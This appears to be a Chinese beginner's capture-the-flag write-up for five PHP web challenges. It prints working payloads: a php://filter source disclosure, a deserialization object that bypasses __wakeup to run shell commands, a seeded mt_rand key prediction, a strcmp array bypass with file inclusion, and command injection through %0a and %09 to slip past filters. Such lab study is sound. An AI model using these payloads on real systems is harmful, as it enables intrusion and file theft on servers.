萌新记录一下
nani
查看源代码:
source
访问后,得到信息user.php
想到文件包含,使用php伪协议读取源代码
php://filter/read=convert.base64-encode/resource=user.php
user.php
<?php
class convent{
var $warn = "No hacker.";
function __destruct(){
eval($this->warn);
}
function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
}
}
$cmd = $_POST[cmd];
unserialize($cmd);
?>
反序列化的问题:
1、绕过__wakeup()魔术方法:当成员属性数目大于实际数目时可绕过
2、构造payload,执行命令
O:7:"convent":4:{s:4:"warn";s:15:"passthru('ls');";} //读取文件列表,得到存储flag的文件名
O:7:"convent":4:{s:4:"warn";s:39:"passthru('cat dsuhhjfdgjhaskjdkj.txt');";} //读取文件内容
得到flag:
nani
random
访问后得到源代码:
<?php
show_source(__FILE__);
include "flag.php";
$a = @$_REQUEST['hello'];
$seed = @$_REQUEST['seed'];
$key = @$_REQUEST['key'];
mt_srand($seed);
$true_key = mt_rand();
if ($key == $true_key){
echo "Key Confirm";
}
else{
die("Key Error");
}
eval( "var_dump($a);");
?>
php伪随机数漏洞
构造payload:
hello=file("./flag.php")&seed=12345&key=162946439
random
admin
访问后得到源代码:
<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
?>
构造payload:
admin1
class.php
<?php
error_reporting(E_ALL & ~E_NOTICE);
class Read{//fffffflag.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "Awwwwwwwwwww man";
}
}
?>
反序列化,构造payload,得到flag:
admin2
ping
访问得到源代码:
<?php
$password="****************";
if(isset($_POST['password'])){
if (strcmp($_POST['password'], $password) == 0) {
echo "Right!!!login success";
include($_REQUEST['path']);
exit();
} else {
echo "Wrong password..";
}
?>
利用strcmp()函数的漏洞,在通过php伪协议读取ping.php文件的源代码:
password[]=1&path=php://filter/read=convert.base64-encode/resource=ping.php
ping.php
<?php
if(isset($_REQUEST[ 'ip' ])) {
$target = trim($_REQUEST[ 'ip' ]);
$substitutions = array(
'&' => '',
';' => '',
'|' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
$cmd = shell_exec( 'ping -c 4 ' . $target );
echo $target;
echo "<pre>{$cmd}</pre>";
}
通过%0a绕过,执行命令:
127.0.0.1%0als //读取文件列表
127.0.0.1%0acat ffffff1111aagggg.txt //读取文件内容
ping
post1
源代码:
POST[a] 这次我们玩过滤好了。
<!--
eval(system($c));//read flag.txt But no cat!!!
-->
fuzz命令,按照群里大佬的思路吧路径'/usr/bin/'与'/bin'的命令整理出来,做成字典,跑一下:
image.png
发现只要字符串中含有cut,就比较特殊,使用cut读取文件,%09绕过空格:
a=cut%09-b%091-%09flag.txt
post1
网友评论